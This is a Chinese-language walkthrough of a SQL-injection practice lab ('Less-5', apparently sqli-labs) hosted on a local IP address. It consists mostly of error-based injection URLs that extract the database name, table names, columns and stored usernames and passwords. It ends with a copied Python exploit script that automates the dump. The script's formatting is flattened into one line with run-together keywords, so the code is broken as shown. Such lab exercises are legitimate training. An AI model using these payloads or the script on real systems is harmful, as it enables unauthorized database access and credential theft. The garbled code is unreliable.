http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23
这是第一次查数据库,页面没啥反应
第二次点击:
爆表名时又遇到了新问题:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'),floor(rand()*2))as a from information_schema.tables group by a%23
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
第二张表:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 1,1),floor(rand()*2))as a from information_schema.tables group by a%23
第三张表:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 2,1),floor(rand()*2))as a from information_schema.tables group by a%23
第四张表:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 3,1),floor(rand()*2))as a from information_schema.tables group by a%23
终于出现了!
爆列名:
列一:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 12,1),floor(rand()*2))as a from information_schema.tables group by a%23
列二:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 13,1),floor(rand()*2))as a from information_schema.tables group by a%23
爆字段:
字段一:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
字段二:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select password from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
注:在爆的时候有可能需要点击两次及以上,毕竟它有个缓冲时间,多查几次就出来了。
exp
网上大牛写的exp脚本,非常值得学习啊!
import requests from bs4 import BeautifulSoup db_name ='' table_list =[] column_list =[] url ='''http://192.168.1.113:86/Less-5/?id=1''' ### 获取当前数据库名 ### print('当前数据库名:') payload ='''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+''' r = requests.get(url+payload) db_name = r.text.split(':')[-2] print('[+]'+ db_name) ### 获取表名 ### print('数据库%s下的表名:'% db_name) for i inrange(50): payload ='''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+'''%(db_name,i) r = requests.get(url+payload) if'group_key'notin r.text: break table_name = r.text.split(':')[-2] table_list.append(table_name) print('[+]'+ table_name) ### 获取列名 ### #### 这里以users表为例 #### print('%s表下的列名:'% table_list[-1]) for i inrange(50): payload ='''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+'''%(table_list[-1],i) r = requests.get(url + payload) if'group_key'notin r.text: break column_name = r.text.split(':')[-2] column_list.append(column_name) print('[+]'+ column_name) ### 获取字段值 ### #### 这里以username列为例 #### print('%s列下的字段值:'% column_list[-2]) for i inrange(50): payload ='''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+'''%(column_list[-2],db_name,table_list[-1],i) r = requests.get(url + payload) if'group_key'notin r.text: break dump = r.text.split(':')[-2] print('[+]'+ dump)